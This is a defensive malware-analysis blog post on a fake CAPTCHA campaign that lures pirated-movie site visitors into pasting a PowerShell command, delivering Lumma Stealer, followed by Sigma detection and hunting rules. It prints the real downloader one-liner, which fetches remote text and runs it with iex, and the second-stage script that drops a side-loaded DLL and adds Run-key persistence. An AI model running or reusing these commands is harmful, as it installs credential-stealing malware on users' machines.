Fake CAPTCHA Campaign on Arabic Pirated Movie Sites Delivers Lumma Stealer
Summary
I began investigating an incident where multiple users in various environments executed the same PowerShell command via the Run dialog. Upon further analysis, I discovered a fake CAPTCHA campaign targeting visitors of Arabic pirated movie websites, including but not limited to:
- Egybest
- Halacima
- Shahedpro
- Mycima
The threat actor appears to have purchased ads on these and other similar websites, redirecting users to a fake CAPTCHA page designed to initiate a malicious infection chain and deliver Lumma stealer.
This blog is broken down into 3 main sections
- Technical Details
- Detection Opportunities
- Hunting Hypothesis
1. Technical details
My investigation revealed that several users visited the same fake verification CAPTCHA site, which they were redirected to from various pirated movie hosting platforms, such as Egybest, Halacima, Shahedpro, and Mycima. These ads led users to a page where they were instructed to open the Run dialog and execute a PowerShell command.
The PowerShell command that the user was asked to paste and run was:
powershell.exe -W Hidden -command $url = '<https://filehere0987>[.]b-cdn[.]net/zuni[.]txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
This command executed this other PowerShell command.
$rCEZu739='<https://filehere0987.b-cdn.net/zuni.zip>';
$x4Yse4tW=$env:APPDATA+'\\kN3C63SQ';
$am1jRlJf=$env:APPDATA+'\\eenoiljQ.zip';
$KiquR5Lx=$x4Yse4tW+'\\Setup.exe';
if (-not (TesT-patH $x4Yse4tW)) { NEW-IteM -Path $x4Yse4tW -ItemType Directory };
Start-bItSTraNSfeR -Source $rCEZu739 -Destination $am1jRlJf;
EXpaND-ArcHiVe -Path $am1jRlJf -DestinationPath $x4Yse4tW -Force;
REMOVe-ITEM $am1jRlJf; StaRT-pROceSS $KiquR5Lx;
neW-iTEmProperty -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name 'U46d9WU7' -Value $KiquR5Lx -PropertyType 'String';
This script performed three main actions:
- Downloaded a ZIP file and extracted it into the AppData directory.
- Executed the extracted setup.exe (1e5e32c35af6bebeb800083f5c637cb03fac3e37), a legitimate Adobe-signed AcroBroker.exe that is vulnerable to DLL side-loading.
- Added persistence by modifying the Run key in the Windows registry.
The dropped files included legitimate DLLs and a malicious sqlite.dll (Lumma Stealer) (bfc1422d1c5351561087bd3e6d82ffbad5221dae), which was loaded via DLL side-loading to execute the malware.
2. Detection Opportunities
The Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
registry key logs all commands executed via the Run dialog. We can create a detection rule based on activity recorded in this key.
The rule below detects any PowerShell execution from the run dialog with suspicious commands, such as hidden executions -W Hidden
, iex
, or encoded commands -encodedCommand
title: Suspicious PowerShell Commands in RunMRU key
id: a7df0e9e-91a5-459a-a003-4cde67c2ff5d
status: test
description: |
Detects suspicious PowerShell commands in the RunMRU registry key, commonly used by threat actors who deceive users
into pasting and executing malicious commands in the Run dialog, often disguised as CAPTCHA verification steps
references:
- https://www.forensafe.com/blogs/runmrukey.html
- https://medium.com/@shaherzakaria8/downloading-trojan-lumma-infostealer-through-capatcha-1f25255a0e71
author: Ahmed Farouk
date: 2024/10/21
tags:
- attack.execution
- attack.t1059.001
logsource:
product: windows
category: registry_set
detection:
selection_key:
TargetObject|contains: 'Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
selection_pwsh:
Details|contains: 'powershell'
selection_sus_keywords:
Details|contains:
- 'http'
- 'ftp'
- 'Hidden'
- 'iex'
- ' -e '
- ' -en '
- ' -enc '
- ' -enco'
- ' -ec '
condition: all of selection_*
falsepositives:
- Unknown
level: high
3. Hunting Hypothesis
Similarly, we can develop a broader threat hunting rule based on the RunMRU key to detect any threat actors employing the same technique, possibly using different images, commands, or methods not covered in the detection rule above.
title: Suspicious Commands in RunMRU key
id: f9d091f6-f1c7-4873-a24f-050b4a02b4dd
status: test
description: |
Detects suspicious commands in the RunMRU registry key, commonly used by threat actors who deceive users
into pasting and executing malicious commands in the Run dialog, often disguised as CAPTCHA verification steps
references:
- https://www.forensafe.com/blogs/runmrukey.html
- https://medium.com/@shaherzakaria8/downloading-trojan-lumma-infostealer-through-capatcha-1f25255a0e71
author: Ahmed Farouk
date: 2024/10/21
tags:
- detection.threat-hunting
- detection.emerging-threats
- attack.execution
logsource:
product: windows
category: registry_set
detection:
selection_key:
TargetObject|contains: 'Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
filter_mrulist:
TargetObject|endswith: 'MRUList'
filter_generic:
Details|contains: 'ping'
condition: all of selection_* and not 1 of filter_*
falsepositives:
- Likely
level: low